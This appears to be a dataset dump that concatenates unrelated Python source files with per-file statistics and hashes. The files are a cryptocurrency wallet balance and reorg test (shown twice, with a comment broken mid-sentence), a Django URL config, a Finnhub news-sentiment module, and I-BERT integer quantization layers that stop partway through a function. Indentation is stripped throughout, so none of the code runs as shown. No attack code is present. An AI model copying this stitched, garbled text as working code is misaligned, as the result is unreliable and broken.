# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| 47.572519 | 153 | 0.656611 |
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
utxos = [u for u in node.listunspent(0) if u['spendable']]
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'],
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
# tracking of transaction trust for summing balances doesn't consider
specific UTXO existing
# which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0'))
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex'])
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))
assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| true | true |
f719173f8124d167cfa365f834dbc8b7c61362f6 | 247 | py | Python | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | null | null | null | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | 3 | 2021-03-19T01:18:39.000Z | 2021-04-08T19:55:26.000Z | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from api import views
urlpatterns = [
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
path('riskcalc', views.calculate_risk)
]
| 24.7 | 54 | 0.716599 | from django.contrib import admin
from django.urls import path, include
from api import views
urlpatterns = [
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
path('riskcalc', views.calculate_risk)
]
| true | true |
f719184d0965b1afb362f1bed12ae11aa08d5a1a | 2,600 | py | Python | gamestonk_terminal/behavioural_analysis/finnhub_view.py | shanedrinion/GamestonkTerminal | baf36aa7c96de6918911c7a263cf5ac9648b27e3 | [
"MIT"
] | 1 | 2021-12-17T19:25:12.000Z | 2021-12-17T19:25:12.000Z | gamestonk_terminal/behavioural_analysis/finnhub_view.py | lolrenx/GamestonkTerminal | eb2b0d766bf1b6bb8656d6733083962efb152fe2 | [
"MIT"
] | 1 | 2021-04-20T00:26:20.000Z | 2021-04-20T00:26:20.000Z | gamestonk_terminal/behavioural_analysis/finnhub_view.py | lolrenx/GamestonkTerminal | eb2b0d766bf1b6bb8656d6733083962efb152fe2 | [
"MIT"
] | null | null | null | import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
"""Get sentiment stats
Parameters
----------
ticker : str
Ticker to get sentiment stats
Returns
-------
Dict
Get sentiment stats
"""
response = requests.get(
f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
return response.json()
return {}
def sentiment_stats(other_args: List[str], ticker: str):
"""Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score
Parameters
----------
other_args : List[str]
Command line arguments to be processed with argparse
ticker : str
Ticker to get sentiment stats
"""
parser = argparse.ArgumentParser(
add_help=False,
prog="stats",
description="""
Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
[Source: https://finnhub.io]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
d_stats = get_sentiment_stats(ticker)
if d_stats:
print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
print("")
print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
print("")
print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
print("")
print(
f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
)
print(
f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
)
else:
print("No sentiment stats found.")
print("")
except Exception as e:
print(e, "\n")
| 31.325301 | 109 | 0.609231 | import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
response = requests.get(
f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
return response.json()
return {}
def sentiment_stats(other_args: List[str], ticker: str):
parser = argparse.ArgumentParser(
add_help=False,
prog="stats",
description="""
Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
[Source: https://finnhub.io]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
d_stats = get_sentiment_stats(ticker)
if d_stats:
print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
print("")
print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
print("")
print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
print("")
print(
f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
)
print(
f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
)
else:
print("No sentiment stats found.")
print("")
except Exception as e:
print(e, "\n")
| true | true |
f71918615f3a215dc0bc915794b798facde5f6a8 | 22,397 | py | Python | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
def __init__(
self,
num_embeddings,
embedding_dim,
padding_idx=None,
max_norm=None,
norm_type=2.0,
scale_grad_by_freq=False,
sparse=False,
_weight=None,
weight_bit=8,
momentum=0.95,
quant_mode=False,
):
super().__init__()
self.num_ = num_embeddings
self.dim = embedding_dim
self.padding_idx = padding_idx
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
self.sparse = sparse
self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
self.register_buffer("weight_scaling_factor", torch.zeros(1))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.weight_bit = weight_bit
self.momentum = momentum
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def forward(self, x, positions=None, incremental_state=None):
if not self.quant_mode:
return (
F.embedding(
x,
self.weight,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
),
None,
)
w = self.weight
w_transform = w.data.detach()
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.weight_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, False
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
)
emb_int = F.embedding(
x,
self.weight_integer,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
)
return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
def __init__(
self,
activation_bit,
act_range_momentum=0.95,
per_channel=False,
channel_len=None,
quant_mode=False,
):
super().__init__()
self.activation_bit = activation_bit
self.act_range_momentum = act_range_momentum
self.quant_mode = quant_mode
self.per_channel = per_channel
self.percentile = False
self.act_function = SymmetricQuantFunction.apply
if not self.per_channel:
self.register_buffer("x_min", torch.zeros(1))
self.register_buffer("x_max", torch.zeros(1))
self.register_buffer("act_scaling_factor", torch.zeros(1))
self.x_min -= 1e-5
self.x_max += 1e-5
else:
raise NotImplementedError("per-channel mode is not currently supported for activation.")
def __repr__(self):
return (
f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
f"quant_mode: {self.activation_bit}, Act_min: {self.x_min.item():.2f}, "
f"Act_max: {self.x_max.item():.2f})"
)
def forward(
self,
x,
pre_act_scaling_factor=None,
identity=None,
identity_scaling_factor=None,
specified_min=None,
specified_max=None,
):
x_act = x if identity is None else identity + x
# collect running stats if training
if self.training:
assert not self.percentile, "percentile mode is not currently supported for activation."
assert (
not self.per_channel
), "per-channel mode is not currently supported for activation."
x_min = x_act.data.min()
x_max = x_act.data.max()
assert (
x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
), "NaN detected when computing min/max of the activation"
# Initialization
if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
self.x_min = self.x_min + x_min
self.x_max = self.x_max + x_max
# exponential moving average (EMA)
# use momentum to prevent the quantized values change greatly every iteration
elif self.act_range_momentum == -1:
self.x_min = torch.min(self.x_min, x_min)
self.x_max = torch.max(self.x_max, x_max)
else:
self.x_min = self.x_min * self.act_range_momentum + x_min * (
1 - self.act_range_momentum
)
self.x_max = self.x_max * self.act_range_momentum + x_max * (
1 - self.act_range_momentum
)
if not self.quant_mode:
return x_act, None
x_min = self.x_min if specified_min is None else specified_min
x_max = self.x_max if specified_max is None else specified_max
self.act_scaling_factor = symmetric_linear_quantization_params(
self.activation_bit, x_min, x_max, per_channel=self.per_channel
)
if pre_act_scaling_factor is None:
# this is for the input quantization
quant_act_int = self.act_function(
x, self.activation_bit, self.percentile, self.act_scaling_factor
)
else:
quant_act_int = FixedPointMul.apply(
x,
pre_act_scaling_factor,
self.activation_bit,
self.act_scaling_factor,
identity,
identity_scaling_factor,
)
correct_output_scale = self.act_scaling_factor.view(-1)
return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
def __init__(
self,
in_features,
out_features,
bias=True,
weight_bit=8,
bias_bit=32,
per_channel=False,
quant_mode=False,
):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
if bias:
self.bias = nn.Parameter(torch.zeros(out_features))
self.register_buffer("bias_integer", torch.zeros_like(self.bias))
self.weight_bit = weight_bit
self.quant_mode = quant_mode
self.per_channel = per_channel
self.bias_bit = bias_bit
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def __repr__(self):
s = super().__repr__()
s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
return s
def forward(self, x, prev_act_scaling_factor=None):
if not self.quant_mode:
return F.linear(x, weight=self.weight, bias=self.bias), None
# assert that prev_act_scaling_factor is a scalar tensor
assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
"Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
"Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
)
w = self.weight
w_transform = w.data.detach()
if self.per_channel:
w_min, _ = torch.min(w_transform, dim=1, out=None)
w_max, _ = torch.max(w_transform, dim=1, out=None)
else:
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.fc_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, self.per_channel
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
)
bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor
if self.bias is not None:
self.bias_integer = self.weight_function(
self.bias, self.bias_bit, False, bias_scaling_factor
)
prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
x_int = x / prev_act_scaling_factor
return (
F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
* bias_scaling_factor,
bias_scaling_factor,
)
class IntGELU(qc.Module):
def __init__(self, quant_mode=True, force_dequant="none"):
super().__init__()
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "gelu"]:
logger.info("Force dequantize gelu")
self.quant_mode = False
if not self.quant_mode:
self.activation_fn = nn.GELU()
self.k = 1.4142
self.const = 14 # dummy integer constant
self.coeff = [-0.2888, -1.769, 1] # a(x+b)**2 + c
self.coeff[2] /= self.coeff[0]
def int_erf(self, x_int, scaling_factor):
b_int = torch.floor(self.coeff[1] / scaling_factor)
c_int = torch.floor(self.coeff[2] / scaling_factor**2)
sign = torch.sign(x_int)
abs_int = torch.min(torch.abs(x_int), -b_int)
y_int = sign * ((abs_int + b_int) ** 2 + c_int)
scaling_factor = scaling_factor**2 * self.coeff[0]
# avoid overflow
y_int = floor_ste.apply(y_int / 2**self.const)
scaling_factor = scaling_factor * 2**self.const
return y_int, scaling_factor
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
return self.activation_fn(x), None
x_int = x / scaling_factor
sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)
shift_int = 1.0 // sigmoid_scaling_factor
x_int = x_int * (sigmoid_int + shift_int)
scaling_factor = scaling_factor * sigmoid_scaling_factor / 2
return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
super().__init__()
self.output_bit = output_bit
self.max_bit = 32
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "softmax"]:
logger.info("Force dequantize softmax")
self.quant_mode = False
self.act = QuantAct(16, quant_mode=self.quant_mode)
self.x0 = -0.6931 # -ln2
self.const = 30 # dummy integer constant
self.coef = [0.35815147, 0.96963238, 1.0] # ax**2 + bx + c
self.coef[1] /= self.coef[0]
self.coef[2] /= self.coef[0]
def int_polynomial(self, x_int, scaling_factor):
with torch.no_grad():
b_int = torch.floor(self.coef[1] / scaling_factor)
c_int = torch.floor(self.coef[2] / scaling_factor**2)
z = (x_int + b_int) * x_int + c_int
scaling_factor = self.coef[0] * scaling_factor**2
return z, scaling_factor
def int_exp(self, x_int, scaling_factor):
with torch.no_grad():
x0_int = torch.floor(self.x0 / scaling_factor)
x_int = torch.max(x_int, self.const * x0_int)
q = floor_ste.apply(x_int / x0_int)
r = x_int - x0_int * q
exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
scaling_factor = exp_scaling_factor / 2**self.const
return exp_int, scaling_factor
def forward(self, x, scaling_factor):
if not self.quant_mode:
return F.softmax(x, dim=-1), None
x_int = x / scaling_factor
x_int_max, _ = x_int.max(dim=-1, keepdim=True)
x_int = x_int - x_int_max
exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)
# Avoid overflow
exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
exp_int = exp / exp_scaling_factor
exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
scaling_factor = 1 / 2**self.output_bit
return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
super().__init__()
self.normalized_shape = normalized_shape
self.eps = eps
self.weight = nn.Parameter(torch.zeros(normalized_shape))
self.bias = nn.Parameter(torch.zeros(normalized_shape))
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "layernorm"]:
logger.info("Force dequantize layernorm")
self.quant_mode = False
self.register_buffer("shift", torch.zeros(1))
self.output_bit = output_bit
self.max_bit = 32
self.dim_sqrt = None
self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)
def set_shift(self, y_int):
with torch.no_grad():
y_sq_int = y_int**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
shift_old = self.shift
self.shift = torch.max(self.shift, shift)
logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")
def overflow_fallback(self, y_int):
self.set_shift(y_int) # adjusts `self.shift`
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
return var_int
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
mean = x.mean(axis=2, keepdim=True)
y = x - mean
var = torch.mean(y**2, axis=2, keepdim=True)
x = y / torch.sqrt(self.eps + var)
x = x * self.weight + self.bias
return x, None
# compute sqrt of the feature dimension if it is the first run
if self.dim_sqrt is None:
n = torch.tensor(x.shape[2], dtype=torch.float)
self.dim_sqrt = torch.sqrt(n).to(x.device)
# Normalization: computes mean and variance(std)
x_int = x / scaling_factor
mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
y_int = x_int - mean_int
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
# overflow handling in training time
if self.training:
# if overflow is detected
if var_int.max() >= 2**self.max_bit:
var_int = self.overflow_fallback(y_int)
assert var_int.max() < 2**self.max_bit + 0.1, (
"Error detected in overflow handling: "
"`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
)
# To be replaced with integer-sqrt kernel that produces the same output
std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
factor = floor_ste.apply(2**31 / std_int)
y_int = floor_ste.apply(y_int * factor / 2)
scaling_factor = self.dim_sqrt / 2**30
# scaling and shifting
bias = self.bias.data.detach() / (self.weight.data.detach())
bias_int = floor_ste.apply(bias / scaling_factor)
y_int = y_int + bias_int
scaling_factor = scaling_factor * self.weight
x = y_int * scaling_factor
return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
input_length = input.shape[0]
lower_index = round(input_length * (1 - lower_percentile * 0.01))
upper_index = round(input_length * upper_percentile * 0.01)
upper_bound = torch.kthvalue(input, k=upper_index).values
if lower_percentile == 0:
lower_bound = upper_bound * 0
# lower_index += 1
else:
lower_bound = -torch.kthvalue(-input, k=lower_index).values
if not output_tensor:
lower_bound = lower_bound.item()
upper_bound = upper_bound.item()
return lower_bound, upper_bound
def linear_quantize(input, scale, zero_point, inplace=False):
if len(input.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
zero_point = zero_point.view(-1, 1, 1, 1)
# reshape scale and zeropoint for linear weights
elif len(input.shape) == 2:
scale = scale.view(-1, 1)
zero_point = zero_point.view(-1, 1)
else:
scale = scale.view(-1)
zero_point = zero_point.view(-1)
# quantized = float / scale + zero_point
if inplace:
input.mul_(1.0 / scale).add_(zero_point).round_()
return input
